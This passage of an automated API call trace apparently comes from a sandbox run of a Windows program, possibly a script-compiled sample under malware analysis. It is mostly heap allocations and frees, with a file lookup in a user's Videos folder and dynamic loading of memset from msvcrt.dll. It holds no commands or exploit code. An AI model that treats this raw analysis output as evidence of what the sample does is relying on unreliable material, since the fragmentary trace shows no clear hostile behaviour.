(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0194.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0194.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0194.123] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0194.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0194.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0194.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0194.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0194.132] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x954c2e20, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xbfc92110, ftLastAccessTime.dwHighDateTime=0x1d5e425, ftLastWriteTime.dwLowDateTime=0xbfc92110, ftLastWriteTime.dwHighDateTime=0x1d5e425, nFileSizeHigh=0x0, nFileSizeLow=0xb330, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="xhiatAIn2v.avi", cAlternateFileName="XHIATA~1.AVI")) returned 0x90ae18 [0194.134] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0194.138] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0194.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0194.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0194.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0194.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0194.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0194.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0194.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0194.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0194.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0194.252] CharLowerBuffW (in: lpsz="byte[45872]", cchLength=0xb | out: lpsz="byte[45872]") returned 0xb [0194.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0194.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0194.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0194.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0194.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0194.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0194.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0194.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0194.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0194.266] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0194.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0194.266] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0194.270] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0194.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0194.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0194.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0194.276] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0194.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0194.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0194.282] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0194.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0194.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0194.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0194.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e1770 [0194.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e1770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0194.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0194.295] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0194.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0194.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0194.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0194.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0194.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0194.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0194.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0194.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0194.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0194.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0194.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0194.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0194.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0194.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0194.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0194.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0194.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0194.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0194.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0194.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0194.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0194.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0194.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0194.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0194.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0194.306] FreeLibrary (hLibModule=0x75c90000) returned 1 [0194.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0194.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0194.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0194.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0194.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0194.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0194.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0194.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0194.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0194.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0194.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0194.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0194.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0194.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0194.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0194.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0194.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0194.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0194.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0194.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0194.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0194.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0194.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0194.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0194.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0194.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0194.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0194.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.319] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0194.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0194.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0194.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0194.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0194.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.319] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0194.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0194.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0194.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0194.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0194.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0194.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0194.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0194.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0194.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0194.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0194.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0194.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0194.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0194.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0194.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0194.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0194.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0194.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0194.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0194.357] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0194.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0194.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0194.357] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0194.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0194.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0194.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0194.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0194.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0194.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0194.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0194.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0194.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0194.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19d0 [0194.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0194.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0194.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda98 [0194.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0194.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0194.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0194.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0194.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0194.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0194.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0194.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0194.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0194.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0194.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0194.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0194.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0194.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0194.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0194.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0194.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0194.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0194.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0194.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0194.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0194.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0194.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0194.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0194.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0194.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0194.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0194.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0194.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0194.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0194.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0194.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0194.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0194.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0194.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0194.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0194.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0194.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0194.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0194.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0194.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0194.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0194.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0194.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0194.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0194.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0194.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0194.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0194.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0194.450] RtlAllocateHeap (HeapHandle=0x8a0000, 